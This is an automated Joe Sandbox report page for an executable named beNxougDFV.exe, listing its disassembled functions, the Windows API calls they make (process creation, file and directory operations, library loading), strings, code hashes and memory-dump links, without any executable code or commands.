Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
Instruction ID: 33be00f72f12327029ad1653fb2bc99e6b823e337a66ede3503504709cbc349d
Opcode Fuzzy Hash: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
Instruction Fuzzy Hash: 31015A72504209AEDF228F61CC09FEB3BA8EF55364F008426FE59A2190D778DA54CFA4

Function 004055CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
CloseHandle.KERNEL32(?), ref: 00405604

Strings

Error launching installer, xrefs: 004055E1

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: f1ce92c91028e46d95f0eda4fe37c0312dcd0371124bcb88e834d1219d8c4f53
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: 5BE04FF0A00209BFEB009B60EC05F7B7ABCEB00748F404961BD11F31A0E374A9108A79

Function 004069F0 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
Instruction ID: c387c58543e41996c7b199f294dd4e3f2d8ae9e2c90db5b1f56269fb3149e58b
Opcode Fuzzy Hash: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
Instruction Fuzzy Hash: 32A14271E00229CBDF28CFA8C8587ADBBB1FF44305F15806AD856BB281D7785A96DF44

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
Instruction ID: c0a55b7bb8cda596ca91e270a613f9aea3b485865d608933a43e484043593474
Opcode Fuzzy Hash: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
Instruction Fuzzy Hash: 45913374D00229CBDF28CF98C8587ADBBB1FF44305F15812AD816BB291C7785996DF48

Function 00406907 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
Instruction ID: 33bdc002aa07cba8751fe1bb89261eb1bbd9089b315c8d097eab8488b12144ec
Opcode Fuzzy Hash: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
Instruction Fuzzy Hash: 19814575D04228DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB291C7389A96DF44

Function 0040640C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
Instruction ID: 368e1e7272001cfb6f2dd5e39cf93d71f7d9f1f25059b380f60c2813f7b9aa4b
Opcode Fuzzy Hash: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
Instruction Fuzzy Hash: 00818735D04228DBDF28CFA8C8447ADBBB1FB44305F21816AD856BB2C1D7785A96DF48

Function 0040685A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
Instruction ID: 563e9c7bfc12ab1e5735381274df4cd9413df1207b4ba467b436c4b8586dcceb
Opcode Fuzzy Hash: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
Instruction Fuzzy Hash: C9713471D04228DFDF28CFA8C884BADBBB1FB44305F15806AD816B7291D7389996DF58

Function 00406978 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
Instruction ID: 7154c5ac750784d404653f653373d782701dde13a8780768b6f209b569f9d9aa
Opcode Fuzzy Hash: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
Instruction Fuzzy Hash: 61714471D04228DBDF28CFA8C894BADBBB1FB44305F15806AD816BB291C7385996DF48

Function 004068C4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
Instruction ID: 6d4e519aaefd354d35621c14bbf49efb9ee6a20a3da98f77445617ba41e869e3
Opcode Fuzzy Hash: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
Instruction Fuzzy Hash: 64715771D04229DBEF28CF98C844BADBBB1FF44305F15806AD816B7291C7389996DF48

Function 00401B5D Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BCC
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BDE

Strings

307, xrefs: 00401B84, 00401B8A, 00401BA4

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Global$AllocFree
String ID: 307
API String ID: 3394109436-3197571367
Opcode ID: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
Instruction ID: 8e70e66a58bbe0bbdc708fb34704032e6401d8afa79375c0cb6f9cb36bca9441
Opcode Fuzzy Hash: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
Instruction Fuzzy Hash: 9C2193B6704312ABCB10EBA4DD89A5A77B9DB44314720443BF606B32D1D77CE8118B5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 004062C7 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

Part of subcall function 00406259: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
Part of subcall function 00406259: wsprintfA.USER32 ref: 004062A9
Part of subcall function 00406259: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
Instruction ID: 3d2559cad02f3f2c9522d4b64a0f21e72dff4147d54ae6b068db265a7fe850db
Opcode Fuzzy Hash: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
Instruction Fuzzy Hash: 10E08C32A08111ABD3217B749D0493B77A89F8470030208BEF90AF2190D738EC61A6AD

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405ACC
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Function 00405AA3 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004056BB,?,?,00000000,0040589E,?,?,?,?), ref: 00405AA8
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405ABC

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction ID: bcda01e7c8f131fa4aeedd5c016714751ae51b75e9bd1bf7c5bedf72497e11f2
Opcode Fuzzy Hash: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction Fuzzy Hash: 23D01276A18125AFC3102728ED0C89BBF65DB54371705CB31FCB9A26F0E7304C529AA5

Function 00405599 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031AE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 0040559F
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055AD

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: 609e72d12c2576d63fea847a2789036c648b4b30b0b2df40a2479a0d359059ce
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: 80C04C70609502EAEA515B319E08B177A66AB50741F1189356106F41F4D6349551D93F

Function 00405B40 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403170,00000000,00000000,00402FCD,000000FF,00000004,00000000,00000000,00000000), ref: 00405B54

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 4179e0c76098f610a2fd9102cb0c328980851925f4446f1dd22fc868df860445
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: 8CE0EC32A1425EABDF109E659C00EEB7BBCEB05760F048432FD15E3150D235F921DBA9

Function 00405B6F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040313E,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405B83

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: af6d97e9b78343fe008ce3e7999d984a763d513ea29e4df05d500f045cbeb3ca
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: B2E0EC3262425AABDF509E559C00AEB7BACEB05360F008436FD15E2151D635F8219FA5

Function 00405DB5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

